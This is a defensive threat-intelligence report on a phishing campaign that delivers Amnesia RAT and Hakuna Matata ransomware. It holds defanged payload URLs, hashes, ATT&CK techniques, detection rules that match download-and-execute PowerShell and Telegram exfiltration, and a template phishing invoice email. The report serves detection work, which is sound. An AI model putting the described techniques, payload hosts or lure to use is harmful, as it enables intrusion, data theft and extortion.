BLUF

 A highly structured phishing campaign targeting Russian users, delivering Amnesia RAT and Hakuna Matata ransomware via cloud services like GitHub and Dropbox to improve resilience against takedowns.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.

For organizations affected by a multi-stage phishing campaign delivering Amnesia RAT with ransomware capability:

·       Low-end total cost: $750,000 – $1.3 million

o   (limited endpoint spread, early containment, no confirmed data exfiltration)

·       Typical expected range: $1.5 million – $3.8 million

o   (credential theft confirmed, moderate operational disruption, partial recovery)

·       Upper-bound realistic scenarios: $4.0 million – $7.5 million

o   (broader persistence, data access concerns, regulatory and insurance friction)

Key Cost Drivers

·       Scope and dwell time of credential and session compromise

·       Number of endpoints requiring rebuild or credential reset

·       Business process dependency on affected user accounts

·       Regulatory notification thresholds triggered by access vs. exfiltration

·       Cyber insurance exclusions tied to control impairment or tooling misuse

Targeted Sectors

·       Business

·       Commercial

Countries

·       Russia

Date of First Reported Activity

·       January 24, 2026

Date of Last Reported Update

·       January 27, 2026

APT Groups

·       Not applicable

Criminal Organizations

·       Not known suspected financially motivated

IOCs

As a reminder, detection should focus on the heuristic behavior of the attacks. Indicators such as hashes, domains, and similar artifacts can be useful for identifying historical activity; however, attackers are highly dynamic. These indicators often vary by target and attack, and can even change within the same attack.

Network Indicators (URLs)

Attackers utilized public cloud services to host malicious scripts and binaries to blend with legitimate traffic.

Initial Stage Loader

·       hxxps://raw.githubusercontent[.]com/scofild89/run/main/loader.ps1

Final Stage Payload

·       hxxps://www.dropbox[.]com/scl/fi/0gskgndm4uov9o94pnm87/client.exe?rlkey=5u5z5...

·       hxxps://www.dropbox[.]com/scl/fi/f2hsk8677fjk19p88f9a2/server.exe?rlkey=4x4y4... (Additional Binary Hosting)

File and Script Indicators

Stage 1

(PowerShell): loader.ps1 Executes the Stage 2 orchestrator and performs initial environment checks.

Stage 2

(VBScript): orchestrator.vbs Obfuscated script responsible for defensive neutralization (e.g., abusing the Defendnot tool to disable Microsoft Defender).

Final Payloads

·       Amnesia_RAT.exe (Persistent surveillance and data theft)

·       Hakuna_Matata_Ransomware.exe (File encryption)

·       WinLocker.exe (System access restriction)

Behavioral Indicators

·       Defensive Neutralization

o   Operational abuse of the Defendnot research tool to disable Windows Security Center and Microsoft Defender.

·       Modular Hosting

o   Separation of infrastructure using GitHub for script distribution and Dropbox for binary payloads.

·       Lure Documents

o   The use of business-themed "decoy" documents that display fake status messages to distract the user while malicious activity runs in the background.

Tools used

·       PowerShell

·       GitHub

·       Dropbox

·       WinLocker component

TTPs:

Initial Access

·       T1566.001 Phishing Spearphishing Attachment

o   Attackers deliver business-themed lures, such as compressed archives containing Russian-language documents related to accounting tasks.

Execution

·       T1204.002 User Execution Malicious File

o   Victims are tricked into opening a malicious Windows Shortcut (LNK) file, often using double extensions (e.g., .txt.lnk) to appear as a text document.

·       T1059.001 Command and Scripting Interpreter PowerShell

o   The LNK file executes a PowerShell command to download and run the stage-one loader.

·       T1059.005 Command and Scripting Interpreter Visual Basic

o   An obfuscated VBScript serves as a stage-two orchestrator to initialize core objects.

Persistence

·       T1547.001 Boot or Logon Autostart Execution Registry Run Keys / Startup Folder

o    Used to ensure the initial loader remains active across system restarts.

·       T1546.002 Event Triggered Execution Screensaver

o   This campaign has been observed abusing screensaver settings as a persistence mechanism during later stages.

Defense Evasion

·       T1562.001 Impair Defenses: Disable or Modify Tools

o   Attackers use the Defendnot research tool to disable Microsoft Defender and prevent security scans.

·       T1027 Obfuscated Files or Information

o   Both the PowerShell scripts and VBScript orchestrators use heavy obfuscation to evade signature-based detection.

·       T1102.001 Web Service Dead Drop Resolver

o   The campaign leverages GitHub to distribute scripts and Dropbox to host binary payloads, blending malicious traffic with legitimate cloud service activity.

Discovery

·       T1082 System Information Discovery

o   The malware performs environment reconnaissance to identify system configurations and potential analysis tools.

Collection

·       T1555 Credentials from Password Stores

o   Amnesia RAT is specifically designed for credential theft and session hijacking.

·       T1125 Video Capture

o   The RAT includes real-time surveillance capabilities, such as screen capturing and webcam access.

Command and Control

·       T1104 Multi-Stage Channels

o   The attack employs multiple stages for command and control, calling back to different servers for each phase of the compromise.

Impact

·       T1486 Data Encrypted for Impact

o   The final stage of the attack often culminates in the deployment of a Hakuna Matata-derived ransomware payload to encrypt victim data.

Malware Name

·       Amnesia RAT

o   Sometimes observed as svchost.scr

sha256

c300943c88a0cae2eb609954b59c933b253c340f2997587830aee3d69adb7769

sha256

25e297f30215aa7001b85e8414890b2b7674bd7998bea4b9650ddc076df35114

Malware Family

·       Amnesia / Hakuna Matata (often deployed alongside Hakuna Matata-derived ransomware).

Known Decoding Key

·       Uses a layered decoding process beginning with Base64, followed by RC4 decryption to reconstruct the payload in memory.

Verdict

·       Malicious (High Risk); capable of full system compromise and data exfiltration.

Primary Objectives

·       Extensive data theft (web browsers

·       Cryptocurrency wallets

·       Messaging apps like Telegram/Discord)

·       Providing remote command-and-control (C2) over infected hosts.

Behavior Analysis

Security Disruption

·       Utilizes the Defendnot tool to trick the Windows Security Center into disabling Microsoft Defender by registering itself as a fake legitimate antivirus.

Persistence & Lockdown

·       Disables administrative tools (Task Manager, Registry Editor) via registry policies

·       Neutralizes recovery mechanisms like Volume Shadow Copies and the Windows Recovery Environment (reagentc /disable).

Information Stealing

·       Targets Chromium-based browsers to steal cookies and credentials using Windows DPAPI.

·       Hijacks Telegram Desktop sessions by exfiltrating the tdata directory.

·       Monitors the clipboard to intercept cryptocurrency seed phrases and modify wallet addresses during transactions.

C2 Communication

·       Establishes a two-way TCP connection and utilizes Telegram Bot APIs for data exfiltration.

CVEs

·       Not applicable

Suggested Rules / potential hunts

As a reminder, these are indicator rules. They are likely to be noisy.

For best results consider creating a data model and reviewing the traffic as a report.

Suricata Rules

·       Alert on potential download of Amnesia payloads from Dropbox/GitHub

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Possible Amnesia Campaign Payload Download (Dropbox/GitHub)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:".zip"; http.uri; content:"/raw/main/"; http.host; content:"githubusercontent.com"; sid:1000001; rev:1;)

·       Alert on suspicious user-agent used in malicious scripts

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Suspicious User-Agent Potential Amnesia C2"; http.user_agent; content:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"; flow:to_server; sid:1000002; rev:1;)

·       Detect data exfiltration/C2 via Telegram bots (common in this campaign)

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg:"Potential Amnesia RAT Data Exfiltration to Telegram"; tls.sni; content:"api.telegram.org"; sid:1000003; rev:1;)

SentinelOne

·       Look for the tool attempting to modify Windows Security Center.

s1ql

Endpoint.name in (*) AND EventType = "Process Creation" AND (Process.cmdline contains "defendnot" OR Process.cmdline contains "Add-MpPreference" OR Process.cmdline contains "ExclusionPath")

·       Detects obfuscated PowerShell commands designed to download and execute payloads.

s1ql

Endpoint.name in (*) AND EventType = "Process Creation" AND Process.name = "powershell.exe" AND (Process.cmdline contains "DownloadString" OR Process.cmdline contains "Invoke-Expression" OR Process.cmdline contains "-EncodedCommand")

Detects the Hakuna Matata ransomware encryption activity.

s1ql

Endpoint.name in (*) AND EventType = "File Modification" AND File.name contains ".@NeverMind12F"

 Splunk

·       Detects when cscript.exe or wscript.exe runs a file from temporary folders.

index=windows sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1

(Image="*\\cscript.exe" OR Image="*\\wscript.exe") AND CommandLine="*\\AppData\\Local\\Temp\\*"

| table _time, Computer, User, CommandLine, ParentImage

·       Identifies registry changes or command-line arguments used to disable security settings.

index=windows sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

(EventCode=1 AND (CommandLine="*Defendnot*" OR CommandLine="*DisableAntiSpyware*"))

OR (EventCode=13 AND TargetObject="*\\Policies\\Microsoft\\Windows Defender*")

| stats count by Computer, User, CommandLine, TargetObject

·       Detects high-volume connections to GitHub/Dropbox, indicative of staging.

index=proxy sourcetype=access_combined (site="github.com" OR site="dropbox.com")

| stats count by src_ip, site, url

| where count > 50

Delivery Method

·       Spear-phishing emails with business-themed archives containing decoy documents and malicious LNK files.

Email example

The lures typically use fake business documents—such as invoices, contracts, or shipping notifications—to trick recipients into initiating the infection chain.

While the exact text varies, a representative example based on the campaign's tactics is as follows:

Subject

·       Action Required

·       Overdue Invoice [Reference Number]

Body

Dear [Name/Department],Attached is the outstanding invoice for the services rendered in the previous quarter. Please review the document and confirm payment by the end of the business day to avoid service interruption.Thank you,

[Fake Business Name] Accounts Payable

Attachment

·       Invoice_Details.zip or a business-themed document (e.g., .doc or .pdf) containing malicious scripts.

References

Fortinet

·       hxxps://www.fortinet.com/blog/threat-research/inside-a-multi-stage-windows-malware-campaign

The Hacker News

·       hxxps://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html

GBHackers

·       https://gbhackers.com/windows-malware-3/

VirusTotal

·       hxxps://www.virustotal.com/gui/file/c300943c88a0cae2eb609954b59c933b253c340f2997587830aee3d69adb7769/details